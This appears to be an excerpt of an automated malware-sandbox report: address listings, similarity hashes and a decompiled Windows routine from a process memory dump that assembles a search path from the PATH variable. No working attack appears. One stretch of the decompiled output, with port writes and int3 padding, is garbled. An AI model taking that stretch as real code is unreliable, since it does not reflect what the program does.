                                                                      0x00a5487d
                                                                      0x00a5487d
                                                                      0x00a54882
                                                                      0x00a54889
                                                                      0x00a54889
                                                                      0x00a5488f
                                                                      0x00a54891
                                                                      0x00a548e0
                                                                      0x00a548e2
                                                                      0x00a548e4
                                                                      0x00a548e4
                                                                      0x00a548e7
                                                                      0x00a548e7
                                                                      0x00a548ed
                                                                      0x00a548f4
                                                                      0x00a548f6
                                                                      0x00a54951
                                                                      0x00a54951
                                                                      0x00a54953
                                                                      0x00a54953
                                                                      0x00a54956
                                                                      0x00a54956
                                                                      0x00a54958
                                                                      0x00a54959
                                                                      0x00a54959
                                                                      0x00a5495d
                                                                      0x00a5495d
                                                                      0x00a5495f
                                                                      0x00a5495f
                                                                      0x00a54965
                                                                      0x00a54969
                                                                      0x00a549ba
                                                                      0x00a549ba
                                                                      0x00a549c1
                                                                      0x00a549c5
                                                                      0x00a549cc
                                                                      0x00a549d4
                                                                      0x00a549d7
                                                                      0x00a549da
                                                                      0x00a549e4
                                                                      0x00a549e5
                                                                      0x00a549f3
                                                                      0x00a54a02
                                                                      0x00000000
                                                                      0x00a54a02
                                                                      0x00a54972
                                                                      0x00a54974
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a54976
                                                                      0x00a54979
                                                                      0x00a54982
                                                                      0x00a54983
                                                                      0x00a54984
                                                                      0x00a5498b
                                                                      0x00a5498d
                                                                      0x00a54991
                                                                      0x00a54993
                                                                      0x00a54999
                                                                      0x00a5499d
                                                                      0x00a549a2
                                                                      0x00a549a2
                                                                      0x00a549a2
                                                                      0x00a54999
                                                                      0x00a549ac
                                                                      0x00000000
                                                                      0x00a549b3
                                                                      0x00a548f8
                                                                      0x00a548fe
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a548fe
                                                                      0x00a54895
                                                                      0x00a5489c
                                                                      0x00a548ad
                                                                      0x00a548b2
                                                                      0x00a548b5
                                                                      0x00a548b7
                                                                      0x00a548ba
                                                                      0x00a548bc
                                                                      0x00a548c6
                                                                      0x00a548c6
                                                                      0x00a548cb
                                                                      0x00a548d1
                                                                      0x00a548d4
                                                                      0x00a548d8
                                                                      0x00a548d8
                                                                      0x00000000
                                                                      0x00a548d8
                                                                      0x00a548be
                                                                      0x00a548c0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a548c2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a548c4
                                                                      0x00000000
                                                                      0x00a54882
                                                                      0x00a5487b
                                                                      0x00a54904
                                                                      0x00a54906
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a54908
                                                                      0x00a5490e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a54910
                                                                      0x00a54917
                                                                      0x00a54917
                                                                      0x00000000
                                                                      0x00a54917
                                                                      0x009fb1ba
                                                                      0x00a547f9
                                                                      0x00a547fc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a547fc
                                                                      0x009fb1c0
                                                                      0x009fb1c0
                                                                      0x009fb1c3
                                                                      0x009fb1cb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: _vswprintf_s
                                                                      • String ID:
                                                                      • API String ID: 677850445-0
                                                                      • Opcode ID: 4b8f183628924b255781d08dfc0f40b4b80e7c9f62976cf41964fc0e88429e68
                                                                      • Instruction ID: 898e9e38df8fddb80b73bdfe0b47d4de4f63c6b651772c17f0cb724886d26f57
                                                                      • Opcode Fuzzy Hash: 4b8f183628924b255781d08dfc0f40b4b80e7c9f62976cf41964fc0e88429e68
                                                                      • Instruction Fuzzy Hash: 6451E271D04259CEDB30CF68C941BAEBBB0BF18719F2041ADEC59AB281D7304D899B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                      			E00A22581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200222, char _a1546911902) {
                                                                      				signed int _v8;
                                                                      				signed int _v16;
                                                                      				unsigned int _v24;
                                                                      				void* _v28;
                                                                      				signed int _v32;
                                                                      				unsigned int _v36;
                                                                      				signed int _v37;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				intOrPtr _v60;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				signed int _v72;
                                                                      				signed int _v76;
                                                                      				signed int _v80;
                                                                      				signed int _t239;
                                                                      				signed int _t243;
                                                                      				char _t244;
                                                                      				signed int _t249;
                                                                      				signed int _t251;
                                                                      				intOrPtr _t253;
                                                                      				signed int _t256;
                                                                      				signed int _t263;
                                                                      				signed int _t266;
                                                                      				signed int _t274;
                                                                      				signed int _t280;
                                                                      				signed int _t282;
                                                                      				void* _t284;
                                                                      				void* _t285;
                                                                      				signed int _t286;
                                                                      				unsigned int _t289;
                                                                      				signed int _t293;
                                                                      				void* _t294;
                                                                      				signed int _t295;
                                                                      				signed int _t299;
                                                                      				intOrPtr _t312;
                                                                      				signed int _t321;
                                                                      				signed int _t323;
                                                                      				signed int _t324;
                                                                      				signed int _t328;
                                                                      				signed int _t329;
                                                                      				signed int _t331;
                                                                      				signed int _t333;
                                                                      				signed int _t335;
                                                                      				void* _t336;
                                                                      
                                                                      				_t333 = _t335;
                                                                      				_t336 = _t335 - 0x4c;
                                                                      				_v8 =  *0xaed360 ^ _t333;
                                                                      				_push(__ebx);
                                                                      				_push(__esi);
                                                                      				_push(__edi);
                                                                      				_t328 = 0xaeb2e8;
                                                                      				_v56 = _a4;
                                                                      				_v48 = __edx;
                                                                      				_v60 = __ecx;
                                                                      				_t289 = 0;
                                                                      				_v80 = 0;
                                                                      				asm("movsd");
                                                                      				_v64 = 0;
                                                                      				_v76 = 0;
                                                                      				_v72 = 0;
                                                                      				asm("movsd");
                                                                      				_v44 = 0;
                                                                      				_v52 = 0;
                                                                      				_v68 = 0;
                                                                      				asm("movsd");
                                                                      				_v32 = 0;
                                                                      				_v36 = 0;
                                                                      				asm("movsd");
                                                                      				_v16 = 0;
                                                                      				_t280 = 0x48;
                                                                      				_t309 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                                                                      				_t321 = 0;
                                                                      				_v37 = _t309;
                                                                      				if(_v48 <= 0) {
                                                                      					L16:
                                                                      					_t45 = _t280 - 0x48; // 0x0
                                                                      					__eflags = _t45 - 0xfffe;
                                                                      					if(_t45 > 0xfffe) {
                                                                      						_t329 = 0xc0000106;
                                                                      						goto L32;
                                                                      					} else {
                                                                      						_t328 = L00A14620(_t289,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t280);
                                                                      						_v52 = _t328;
                                                                      						__eflags = _t328;
                                                                      						if(_t328 == 0) {
                                                                      							_t329 = 0xc0000017;
                                                                      							goto L32;
                                                                      						} else {
                                                                      							 *(_t328 + 0x44) =  *(_t328 + 0x44) & 0x00000000;
                                                                      							_t50 = _t328 + 0x48; // 0x48
                                                                      							_t323 = _t50;
                                                                      							_t309 = _v32;
                                                                      							 *(_t328 + 0x3c) = _t280;
                                                                      							_t282 = 0;
                                                                      							 *((short*)(_t328 + 0x30)) = _v48;
                                                                      							__eflags = _t309;
                                                                      							if(_t309 != 0) {
                                                                      								 *(_t328 + 0x18) = _t323;
                                                                      								__eflags = _t309 - 0xae8478;
                                                                      								 *_t328 = ((0 | _t309 == 0x00ae8478) - 0x00000001 & 0xfffffffb) + 7;
                                                                      								E00A3F3E0(_t323,  *((intOrPtr*)(_t309 + 4)),  *_t309 & 0x0000ffff);
                                                                      								_t309 = _v32;
                                                                      								_t336 = _t336 + 0xc;
                                                                      								_t282 = 1;
                                                                      								__eflags = _a8;
                                                                      								_t323 = _t323 + (( *_t309 & 0x0000ffff) >> 1) * 2;
                                                                      								if(_a8 != 0) {
                                                                      									_t274 = E00A839F2(_t323);
                                                                      									_t309 = _v32;
                                                                      									_t323 = _t274;
                                                                      								}
                                                                      							}
                                                                      							_t293 = 0;
                                                                      							_v16 = 0;
                                                                      							__eflags = _v48;
                                                                      							if(_v48 <= 0) {
                                                                      								L31:
                                                                      								_t329 = _v68;
                                                                      								__eflags = 0;
                                                                      								 *((short*)(_t323 - 2)) = 0;
                                                                      								goto L32;
                                                                      							} else {
                                                                      								_t280 = _t328 + _t282 * 4;
                                                                      								_v56 = _t280;
                                                                      								do {
                                                                      									__eflags = _t309;
                                                                      									if(_t309 != 0) {
                                                                      										_t239 =  *(_v60 + _t293 * 4);
                                                                      										__eflags = _t239;
                                                                      										if(_t239 == 0) {
                                                                      											goto L30;
                                                                      										} else {
                                                                      											__eflags = _t239 == 5;
                                                                      											if(_t239 == 5) {
                                                                      												goto L30;
                                                                      											} else {
                                                                      												goto L22;
                                                                      											}
                                                                      										}
                                                                      									} else {
                                                                      										L22:
                                                                      										 *_t280 =  *(_v60 + _t293 * 4);
                                                                      										 *(_t280 + 0x18) = _t323;
                                                                      										_t243 =  *(_v60 + _t293 * 4);
                                                                      										__eflags = _t243 - 8;
                                                                      										if(_t243 > 8) {
                                                                      											goto L56;
                                                                      										} else {
                                                                      											switch( *((intOrPtr*)(_t243 * 4 +  &M00A22959))) {
                                                                      												case 0:
                                                                      													__ax =  *0xae8488;
                                                                      													__eflags = __ax;
                                                                      													if(__ax == 0) {
                                                                      														goto L29;
                                                                      													} else {
                                                                      														__ax & 0x0000ffff = E00A3F3E0(__edi,  *0xae848c, __ax & 0x0000ffff);
                                                                      														__eax =  *0xae8488 & 0x0000ffff;
                                                                      														goto L26;
                                                                      													}
                                                                      													goto L108;
                                                                      												case 1:
                                                                      													L45:
                                                                      													E00A3F3E0(_t323, _v80, _v64);
                                                                      													_t269 = _v64;
                                                                      													goto L26;
                                                                      												case 2:
                                                                      													 *0xae8480 & 0x0000ffff = E00A3F3E0(__edi,  *0xae8484,  *0xae8480 & 0x0000ffff);
                                                                      													__eax =  *0xae8480 & 0x0000ffff;
                                                                      													__eax = ( *0xae8480 & 0x0000ffff) >> 1;
                                                                      													__edi = __edi + __eax * 2;
                                                                      													goto L28;
                                                                      												case 3:
                                                                      													__eax = _v44;
                                                                      													__eflags = __eax;
                                                                      													if(__eax == 0) {
                                                                      														goto L29;
                                                                      													} else {
                                                                      														__esi = __eax + __eax;
                                                                      														__eax = E00A3F3E0(__edi, _v72, __esi);
                                                                      														__edi = __edi + __esi;
                                                                      														__esi = _v52;
                                                                      														goto L27;
                                                                      													}
                                                                      													goto L108;
                                                                      												case 4:
                                                                      													_push(0x2e);
                                                                      													_pop(__eax);
                                                                      													 *(__esi + 0x44) = __edi;
                                                                      													 *__edi = __ax;
                                                                      													__edi = __edi + 4;
                                                                      													_push(0x3b);
                                                                      													_pop(__eax);
                                                                      													 *(__edi - 2) = __ax;
                                                                      													goto L29;
                                                                      												case 5:
                                                                      													__eflags = _v36;
                                                                      													if(_v36 == 0) {
                                                                      														goto L45;
                                                                      													} else {
                                                                      														E00A3F3E0(_t323, _v76, _v36);
                                                                      														_t269 = _v36;
                                                                      													}
                                                                      													L26:
                                                                      													_t336 = _t336 + 0xc;
                                                                      													_t323 = _t323 + (_t269 >> 1) * 2 + 2;
                                                                      													__eflags = _t323;
                                                                      													L27:
                                                                      													_push(0x3b);
                                                                      													_pop(_t271);
                                                                      													 *((short*)(_t323 - 2)) = _t271;
                                                                      													goto L28;
                                                                      												case 6:
                                                                      													__ebx =  *0xae575c;
                                                                      													__eflags = __ebx - 0xae575c;
                                                                      													if(__ebx != 0xae575c) {
                                                                      														_push(0x3b);
                                                                      														_pop(__esi);
                                                                      														do {
                                                                      															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                                      															E00A3F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                                      															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                                      															__edi = __edi + __eax * 2;
                                                                      															__edi = __edi + 2;
                                                                      															 *(__edi - 2) = __si;
                                                                      															__ebx =  *__ebx;
                                                                      															__eflags = __ebx - 0xae575c;
                                                                      														} while (__ebx != 0xae575c);
                                                                      														__esi = _v52;
                                                                      														__ecx = _v16;
                                                                      														__edx = _v32;
                                                                      													}
                                                                      													__ebx = _v56;
                                                                      													goto L29;
                                                                      												case 7:
                                                                      													 *0xae8478 & 0x0000ffff = E00A3F3E0(__edi,  *0xae847c,  *0xae8478 & 0x0000ffff);
                                                                      													__eax =  *0xae8478 & 0x0000ffff;
                                                                      													__eax = ( *0xae8478 & 0x0000ffff) >> 1;
                                                                      													__eflags = _a8;
                                                                      													__edi = __edi + __eax * 2;
                                                                      													if(_a8 != 0) {
                                                                      														__ecx = __edi;
                                                                      														__eax = E00A839F2(__ecx);
                                                                      														__edi = __eax;
                                                                      													}
                                                                      													goto L28;
                                                                      												case 8:
                                                                      													__eax = 0;
                                                                      													 *(__edi - 2) = __ax;
                                                                      													 *0xae6e58 & 0x0000ffff = E00A3F3E0(__edi,  *0xae6e5c,  *0xae6e58 & 0x0000ffff);
                                                                      													 *(__esi + 0x38) = __edi;
                                                                      													__eax =  *0xae6e58 & 0x0000ffff;
                                                                      													__eax = ( *0xae6e58 & 0x0000ffff) >> 1;
                                                                      													__edi = __edi + __eax * 2;
                                                                      													__edi = __edi + 2;
                                                                      													L28:
                                                                      													_t293 = _v16;
                                                                      													_t309 = _v32;
                                                                      													L29:
                                                                      													_t280 = _t280 + 4;
                                                                      													__eflags = _t280;
                                                                      													_v56 = _t280;
                                                                      													goto L30;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      									goto L108;
                                                                      									L30:
                                                                      									_t293 = _t293 + 1;
                                                                      									_v16 = _t293;
                                                                      									__eflags = _t293 - _v48;
                                                                      								} while (_t293 < _v48);
                                                                      								goto L31;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					while(1) {
                                                                      						L1:
                                                                      						_t243 =  *(_v60 + _t321 * 4);
                                                                      						if(_t243 > 8) {
                                                                      							break;
                                                                      						}
                                                                      						switch( *((intOrPtr*)(_t243 * 4 +  &M00A22935))) {
                                                                      							case 0:
                                                                      								__ax =  *0xae8488;
                                                                      								__eflags = __ax;
                                                                      								if(__ax != 0) {
                                                                      									__eax = __ax & 0x0000ffff;
                                                                      									__ebx = __ebx + 2;
                                                                      									__eflags = __ebx;
                                                                      									goto L53;
                                                                      								}
                                                                      								goto L14;
                                                                      							case 1:
                                                                      								L44:
                                                                      								_t309 =  &_v64;
                                                                      								_v80 = E00A22E3E(0,  &_v64);
                                                                      								_t280 = _t280 + _v64 + 2;
                                                                      								goto L13;
                                                                      							case 2:
                                                                      								__eax =  *0xae8480 & 0x0000ffff;
                                                                      								__ebx = __ebx + __eax;
                                                                      								__eflags = __dl;
                                                                      								if(__dl != 0) {
                                                                      									__eax = 0xae8480;
                                                                      									goto L80;
                                                                      								}
                                                                      								goto L14;
                                                                      							case 3:
                                                                      								__eax = E00A0EEF0(0xae79a0);
                                                                      								__eax =  &_v44;
                                                                      								_push(__eax);
                                                                      								_push(0);
                                                                      								_push(0);
                                                                      								_push(4);
                                                                      								_push(L"PATH");
                                                                      								_push(0);
                                                                      								L57();
                                                                      								__esi = __eax;
                                                                      								_v68 = __esi;
                                                                      								__eflags = __esi - 0xc0000023;
                                                                      								if(__esi != 0xc0000023) {
                                                                      									L10:
                                                                      									__eax = E00A0EB70(__ecx, 0xae79a0);
                                                                      									__eflags = __esi - 0xc0000100;
                                                                      									if(__esi == 0xc0000100) {
                                                                      										_v44 = _v44 & 0x00000000;
                                                                      										__eax = 0;
                                                                      										_v68 = 0;
                                                                      										goto L13;
                                                                      									} else {
                                                                      										__eflags = __esi;
                                                                      										if(__esi < 0) {
                                                                      											L32:
                                                                      											_t217 = _v72;
                                                                      											__eflags = _t217;
                                                                      											if(_t217 != 0) {
                                                                      												L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t217);
                                                                      											}
                                                                      											_t218 = _v52;
                                                                      											__eflags = _t218;
                                                                      											if(_t218 != 0) {
                                                                      												__eflags = _t329;
                                                                      												if(_t329 < 0) {
                                                                      													L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
                                                                      													_t218 = 0;
                                                                      												}
                                                                      											}
                                                                      											goto L36;
                                                                      										} else {
                                                                      											__eax = _v44;
                                                                      											__ebx = __ebx + __eax * 2;
                                                                      											__ebx = __ebx + 2;
                                                                      											__eflags = __ebx;
                                                                      											L13:
                                                                      											_t289 = _v36;
                                                                      											goto L14;
                                                                      										}
                                                                      									}
                                                                      								} else {
                                                                      									__eax = _v44;
                                                                      									__ecx =  *0xae7b9c; // 0x0
                                                                      									_v44 + _v44 =  *[fs:0x30];
                                                                      									__ecx = __ecx + 0x180000;
                                                                      									__eax = L00A14620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                                      									_v72 = __eax;
                                                                      									__eflags = __eax;
                                                                      									if(__eax == 0) {
                                                                      										__eax = E00A0EB70(__ecx, 0xae79a0);
                                                                      										__eax = _v52;
                                                                      										L36:
                                                                      										_pop(_t322);
                                                                      										_pop(_t330);
                                                                      										__eflags = _v8 ^ _t333;
                                                                      										_pop(_t281);
                                                                      										return E00A3B640(_t218, _t281, _v8 ^ _t333, _t309, _t322, _t330);
                                                                      									} else {
                                                                      										__ecx =  &_v44;
                                                                      										_push(__ecx);
                                                                      										_push(_v44);
                                                                      										_push(__eax);
                                                                      										_push(4);
                                                                      										_push(L"PATH");
                                                                      										_push(0);
                                                                      										L57();
                                                                      										__esi = __eax;
                                                                      										_v68 = __eax;
                                                                      										goto L10;
                                                                      									}
                                                                      								}
                                                                      								goto L108;
                                                                      							case 4:
                                                                      								__ebx = __ebx + 4;
                                                                      								goto L14;
                                                                      							case 5:
                                                                      								_t276 = _v56;
                                                                      								if(_v56 != 0) {
                                                                      									_t309 =  &_v36;
                                                                      									_t278 = E00A22E3E(_t276,  &_v36);
                                                                      									_t289 = _v36;
                                                                      									_v76 = _t278;
                                                                      								}
                                                                      								if(_t289 == 0) {
                                                                      									goto L44;
                                                                      								} else {
                                                                      									_t280 = _t280 + 2 + _t289;
                                                                      								}
                                                                      								goto L14;
                                                                      							case 6:
                                                                      								__eax =  *0xae5764 & 0x0000ffff;
                                                                      								goto L53;
                                                                      							case 7:
                                                                      								__eax =  *0xae8478 & 0x0000ffff;
                                                                      								__ebx = __ebx + __eax;
                                                                      								__eflags = _a8;
                                                                      								if(_a8 != 0) {
                                                                      									__ebx = __ebx + 0x16;
                                                                      									__ebx = __ebx + __eax;
                                                                      								}
                                                                      								__eflags = __dl;
                                                                      								if(__dl != 0) {
                                                                      									__eax = 0xae8478;
                                                                      									L80:
                                                                      									_v32 = __eax;
                                                                      								}
                                                                      								goto L14;
                                                                      							case 8:
                                                                      								__eax =  *0xae6e58 & 0x0000ffff;
                                                                      								__eax = ( *0xae6e58 & 0x0000ffff) + 2;
                                                                      								L53:
                                                                      								__ebx = __ebx + __eax;
                                                                      								L14:
                                                                      								_t321 = _t321 + 1;
                                                                      								if(_t321 >= _v48) {
                                                                      									goto L16;
                                                                      								} else {
                                                                      									_t309 = _v37;
                                                                      									goto L1;
                                                                      								}
                                                                      								goto L108;
                                                                      						}
                                                                      					}
                                                                      					L56:
                                                                      					_t294 = 0x25;
                                                                      					asm("int 0x29");
                                                                      					asm("out 0x28, al");
                                                                      					 *0xa2286600 = _t243;
                                                                      					_t244 = _t243 + _t243;
                                                                      					asm("daa");
                                                                      					 *0xa2262e00 = _t244;
                                                                      					 *((intOrPtr*)(_t328 + 0x28)) =  *((intOrPtr*)(_t328 + 0x28)) + _t244;
                                                                      					 *0xa2260500 = _t244;
                                                                      					 *_t323 =  *_t323 + _t280;
                                                                      					_pop(_t284);
                                                                      					asm("cmpsb");
                                                                      					 *((intOrPtr*)(_t244 +  &_a1530200222)) =  *((intOrPtr*)(_t244 +  &_a1530200222)) + _t309;
                                                                      					asm("cmpsb");
                                                                      					 *_t309 =  *_t309 + _t244;
                                                                      					 *((intOrPtr*)(_t309 - 0x5dd78000)) =  *((intOrPtr*)(_t309 - 0x5dd78000)) - _t336;
                                                                      					asm("daa");
                                                                      					 *0xa2281e00 = _t244;
                                                                      					 *((intOrPtr*)(_t328 + 0x28)) =  *((intOrPtr*)(_t328 + 0x28)) + _t294;
                                                                      					 *0xa2275d00 = _t244;
                                                                      					_pop(_t285);
                                                                      					asm("cmpsb");
                                                                      					 *((intOrPtr*)(_t244 + _t284 +  &_a1546911902)) =  *((intOrPtr*)(_t244 + _t284 +  &_a1546911902)) + _t309 + _t309;
                                                                      					asm("cmpsb");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					_push(0x20);
                                                                      					_push(0xacff00);
                                                                      					E00A4D08C(_t285, _t323, _t328);
                                                                      					_v44 =  *[fs:0x18];
                                                                      					_t324 = 0;
                                                                      					 *_a24 = 0;
                                                                      					_t286 = _a12;
                                                                      					__eflags = _t286;
                                                                      					if(_t286 == 0) {
                                                                      						_t249 = 0xc0000100;
                                                                      					} else {
                                                                      						_v8 = 0;
                                                                      						_t331 = 0xc0000100;
                                                                      						_v52 = 0xc0000100;
                                                                      						_t251 = 4;
                                                                      						while(1) {
                                                                      							_v40 = _t251;
                                                                      							__eflags = _t251;
                                                                      							if(_t251 == 0) {
                                                                      								break;
                                                                      							}
                                                                      							_t299 = _t251 * 0xc;
                                                                      							_v48 = _t299;
                                                                      							__eflags = _t286 -  *((intOrPtr*)(_t299 + 0x9d1664));
                                                                      							if(__eflags <= 0) {
                                                                      								if(__eflags == 0) {
                                                                      									_t266 = E00A3E5C0(_a8,  *((intOrPtr*)(_t299 + 0x9d1668)), _t286);
                                                                      									_t336 = _t336 + 0xc;
                                                                      									__eflags = _t266;
                                                                      									if(__eflags == 0) {
                                                                      										_t331 = E00A751BE(_t286,  *((intOrPtr*)(_v48 + 0x9d166c)), _a16, _t324, _t331, __eflags, _a20, _a24);
                                                                      										_v52 = _t331;
                                                                      										break;
                                                                      									} else {
                                                                      										_t251 = _v40;
                                                                      										goto L62;
                                                                      									}
                                                                      									goto L70;
                                                                      								} else {
                                                                      									L62:
                                                                      									_t251 = _t251 - 1;
                                                                      									continue;
                                                                      								}
                                                                      							}
                                                                      							break;
                                                                      						}
                                                                      						_v32 = _t331;
                                                                      						__eflags = _t331;
                                                                      						if(_t331 < 0) {
                                                                      							__eflags = _t331 - 0xc0000100;
                                                                      							if(_t331 == 0xc0000100) {
                                                                      								_t295 = _a4;
                                                                      								__eflags = _t295;
                                                                      								if(_t295 != 0) {
                                                                      									_v36 = _t295;
                                                                      									__eflags =  *_t295 - _t324;
                                                                      									if( *_t295 == _t324) {
                                                                      										_t331 = 0xc0000100;
                                                                      										goto L76;
                                                                      									} else {
                                                                      										_t312 =  *((intOrPtr*)(_v44 + 0x30));
                                                                      										_t253 =  *((intOrPtr*)(_t312 + 0x10));
                                                                      										__eflags =  *((intOrPtr*)(_t253 + 0x48)) - _t295;
                                                                      										if( *((intOrPtr*)(_t253 + 0x48)) == _t295) {
                                                                      											__eflags =  *(_t312 + 0x1c);
                                                                      											if( *(_t312 + 0x1c) == 0) {
                                                                      												L106:
                                                                      												_t331 = E00A22AE4( &_v36, _a8, _t286, _a16, _a20, _a24);
                                                                      												_v32 = _t331;
                                                                      												__eflags = _t331 - 0xc0000100;
                                                                      												if(_t331 != 0xc0000100) {
                                                                      													goto L69;
                                                                      												} else {
                                                                      													_t324 = 1;
                                                                      													_t295 = _v36;
                                                                      													goto L75;
                                                                      												}
                                                                      											} else {
                                                                      												_t256 = E00A06600( *(_t312 + 0x1c));
                                                                      												__eflags = _t256;
                                                                      												if(_t256 != 0) {
                                                                      													goto L106;
                                                                      												} else {
                                                                      													_t295 = _a4;
                                                                      													goto L75;
                                                                      												}
                                                                      											}
                                                                      										} else {
                                                                      											L75:
                                                                      											_t331 = E00A22C50(_t295, _a8, _t286, _a16, _a20, _a24, _t324);
                                                                      											L76:
                                                                      											_v32 = _t331;
                                                                      											goto L69;
                                                                      										}
                                                                      									}
                                                                      									goto L108;
                                                                      								} else {
                                                                      									E00A0EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                      									_v8 = 1;
                                                                      									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                                      									_t331 = _a24;
                                                                      									_t263 = E00A22AE4( &_v36, _a8, _t286, _a16, _a20, _t331);
                                                                      									_v32 = _t263;
                                                                      									__eflags = _t263 - 0xc0000100;
                                                                      									if(_t263 == 0xc0000100) {
                                                                      										_v32 = E00A22C50(_v36, _a8, _t286, _a16, _a20, _t331, 1);
                                                                      									}
                                                                      									_v8 = _t324;
                                                                      									E00A22ACB();
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L69:
                                                                      						_v8 = 0xfffffffe;
                                                                      						_t249 = _t331;
                                                                      					}
                                                                      					L70:
                                                                      					return E00A4D0D1(_t249);
                                                                      				}
                                                                      				L108:
                                                                      			}



















































                                                                      0x00a22584
                                                                      0x00a22586
                                                                      0x00a22590
                                                                      0x00a22596
                                                                      0x00a22597
                                                                      0x00a22598
                                                                      0x00a22599
                                                                      0x00a2259e
                                                                      0x00a225a4
                                                                      0x00a225a9
                                                                      0x00a225ac
                                                                      0x00a225ae
                                                                      0x00a225b1
                                                                      0x00a225b2
                                                                      0x00a225b5
                                                                      0x00a225b8
                                                                      0x00a225bb
                                                                      0x00a225bc
                                                                      0x00a225bf
                                                                      0x00a225c2
                                                                      0x00a225c5
                                                                      0x00a225c6
                                                                      0x00a225cb
                                                                      0x00a225ce
                                                                      0x00a225d8
                                                                      0x00a225dd
                                                                      0x00a225de
                                                                      0x00a225e1
                                                                      0x00a225e3
                                                                      0x00a225e9
                                                                      0x00a226da
                                                                      0x00a226da
                                                                      0x00a226dd
                                                                      0x00a226e2
                                                                      0x00a65b56
                                                                      0x00000000
                                                                      0x00a226e8
                                                                      0x00a226f9
                                                                      0x00a226fb
                                                                      0x00a226fe
                                                                      0x00a22700
                                                                      0x00a65b60
                                                                      0x00000000
                                                                      0x00a22706
                                                                      0x00a22706
                                                                      0x00a2270a
                                                                      0x00a2270a
                                                                      0x00a2270d
                                                                      0x00a22713
                                                                      0x00a22716
                                                                      0x00a22718
                                                                      0x00a2271c
                                                                      0x00a2271e
                                                                      0x00a65b6c
                                                                      0x00a65b6f
                                                                      0x00a65b7f
                                                                      0x00a65b89
                                                                      0x00a65b8e
                                                                      0x00a65b93
                                                                      0x00a65b96
                                                                      0x00a65b9c
                                                                      0x00a65ba0
                                                                      0x00a65ba3
                                                                      0x00a65bab
                                                                      0x00a65bb0
                                                                      0x00a65bb3
                                                                      0x00a65bb3
                                                                      0x00a65ba3
                                                                      0x00a22724
                                                                      0x00a22726
                                                                      0x00a22729
                                                                      0x00a2272c
                                                                      0x00a2279d
                                                                      0x00a2279d
                                                                      0x00a227a0
                                                                      0x00a227a2
                                                                      0x00000000
                                                                      0x00a2272e
                                                                      0x00a2272e
                                                                      0x00a22731
                                                                      0x00a22734
                                                                      0x00a22734
                                                                      0x00a22736
                                                                      0x00a65bc1
                                                                      0x00a65bc1
                                                                      0x00a65bc4
                                                                      0x00000000
                                                                      0x00a65bca
                                                                      0x00a65bca
                                                                      0x00a65bcd
                                                                      0x00000000
                                                                      0x00a65bd3
                                                                      0x00000000
                                                                      0x00a65bd3
                                                                      0x00a65bcd
                                                                      0x00a2273c
                                                                      0x00a2273c
                                                                      0x00a22742
                                                                      0x00a22747
                                                                      0x00a2274a
                                                                      0x00a2274d
                                                                      0x00a22750
                                                                      0x00000000
                                                                      0x00a22756
                                                                      0x00a22756
                                                                      0x00000000
                                                                      0x00a22902
                                                                      0x00a22908
                                                                      0x00a2290b
                                                                      0x00000000
                                                                      0x00a22911
                                                                      0x00a2291c
                                                                      0x00a22921
                                                                      0x00000000
                                                                      0x00a22921
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a22880
                                                                      0x00a22887
                                                                      0x00a2288c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a22805
                                                                      0x00a2280a
                                                                      0x00a22814
                                                                      0x00a22816
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a2281e
                                                                      0x00a22821
                                                                      0x00a22823
                                                                      0x00000000
                                                                      0x00a22829
                                                                      0x00a22829
                                                                      0x00a22831
                                                                      0x00a2283c
                                                                      0x00a2283e
                                                                      0x00000000
                                                                      0x00a2283e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a2284e
                                                                      0x00a22850
                                                                      0x00a22851
                                                                      0x00a22854
                                                                      0x00a22857
                                                                      0x00a2285a
                                                                      0x00a2285c
                                                                      0x00a2285d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a2275d
                                                                      0x00a22761
                                                                      0x00000000
                                                                      0x00a22767
